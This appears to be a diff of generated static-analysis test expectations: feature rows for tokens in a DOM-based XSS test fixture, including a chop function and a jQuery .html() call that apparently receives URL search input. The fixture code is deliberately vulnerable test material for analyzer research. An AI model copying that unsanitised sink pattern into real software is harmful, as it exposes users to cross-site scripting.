URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:46:39:46:44 | search | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:46:39:46:44 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:48:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:48:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:48:0 | this | enclosingFunctionBody | s s s substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:48:0 | this | enclosingFunctionName | chop | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:48:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | 'arguments' object of function chop | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | 'arguments' object of function chop | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | 'arguments' object of function chop | enclosingFunctionBody | s s s substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | 'arguments' object of function chop | enclosingFunctionName | chop | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | 'arguments' object of function chop | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | exceptional return of function chop | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | exceptional return of function chop | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | exceptional return of function chop | enclosingFunctionBody | s s s substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | exceptional return of function chop | enclosingFunctionName | chop | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | exceptional return of function chop | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | functio ... n "";\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | functio ... n "";\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | functio ... n "";\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | return of function chop | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | return of function chop | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | return of function chop | enclosingFunctionBody | s s s substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | return of function chop | enclosingFunctionName | chop | +| autogenerated/Xss/DomBasedXss/tst.js:48:1:52:1 | return of function chop | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:48:10:48:13 | chop | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:48:10:48:13 | chop | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:48:10:48:13 | chop | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:48:10:48:13 | chop | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:48:10:48:13 | chop | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:48:10:48:13 | chop | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:48:15:48:15 | s | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:48:15:48:15 | s | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:48:15:48:15 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:48:15:48:15 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:48:15:48:15 | s | enclosingFunctionBody | s s s substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:48:15:48:15 | s | enclosingFunctionBody | s s s substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:48:15:48:15 | s | enclosingFunctionName | chop | +| autogenerated/Xss/DomBasedXss/tst.js:48:15:48:15 | s | enclosingFunctionName | chop | +| autogenerated/Xss/DomBasedXss/tst.js:48:15:48:15 | s | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:48:15:48:15 | s | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:49:7:49:7 | s | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:49:7:49:7 | s | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:49:7:49:7 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:49:7:49:7 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:49:7:49:7 | s | enclosingFunctionBody | s s s substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:49:7:49:7 | s | enclosingFunctionBody | s s s substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:49:7:49:7 | s | enclosingFunctionName | chop | +| autogenerated/Xss/DomBasedXss/tst.js:49:7:49:7 | s | enclosingFunctionName | chop | +| autogenerated/Xss/DomBasedXss/tst.js:49:7:49:7 | s | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:49:7:49:7 | s | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:12 | s | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:12 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:12 | s | enclosingFunctionBody | s s s substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:12 | s | enclosingFunctionName | chop | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:12 | s | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:19 | s.substr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:19 | s.substr | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:19 | s.substr | enclosingFunctionBody | s s s substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:19 | s.substr | enclosingFunctionName | chop | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:19 | s.substr | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:22 | exceptional return of s.substr(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:22 | exceptional return of s.substr(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:22 | exceptional return of s.substr(1) | enclosingFunctionBody | s s s substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:22 | exceptional return of s.substr(1) | enclosingFunctionName | chop | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:22 | exceptional return of s.substr(1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:22 | s.substr(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:22 | s.substr(1) | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:22 | s.substr(1) | enclosingFunctionBody | s s s substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:22 | s.substr(1) | enclosingFunctionName | chop | +| autogenerated/Xss/DomBasedXss/tst.js:50:12:50:22 | s.substr(1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:50:14:50:19 | substr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:50:14:50:19 | substr | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:50:14:50:19 | substr | enclosingFunctionBody | s s s substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:50:14:50:19 | substr | enclosingFunctionName | chop | +| autogenerated/Xss/DomBasedXss/tst.js:50:14:50:19 | substr | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:50:21:50:21 | 1 | CalleeFlexibleAccessPath | s.substr | | autogenerated/Xss/DomBasedXss/tst.js:50:21:50:21 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:50:21:50:21 | 1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16156,36 +112809,247 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:50:21:50:21 | 1 | enclosingFunctionName | chop | | autogenerated/Xss/DomBasedXss/tst.js:50:21:50:21 | 1 | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:50:21:50:21 | 1 | receiverName | s | +| autogenerated/Xss/DomBasedXss/tst.js:51:10:51:11 | "" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:51:10:51:11 | "" | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:51:10:51:11 | "" | enclosingFunctionBody | s s s substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:51:10:51:11 | "" | enclosingFunctionName | chop | +| autogenerated/Xss/DomBasedXss/tst.js:51:10:51:11 | "" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:1 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:1 | $ | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:1 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:9 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:9 | $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:9 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:9 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:9 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:9 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:14 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:14 | $('myId').html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:14 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:46 | $('myId ... earch)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:46 | $('myId ... earch)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:46 | $('myId ... earch)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:46 | exceptional return of $('myId ... earch)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:46 | exceptional return of $('myId ... earch)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:54:1:54:46 | exceptional return of $('myId ... earch)) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:54:3:54:8 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:54:3:54:8 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:54:3:54:8 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 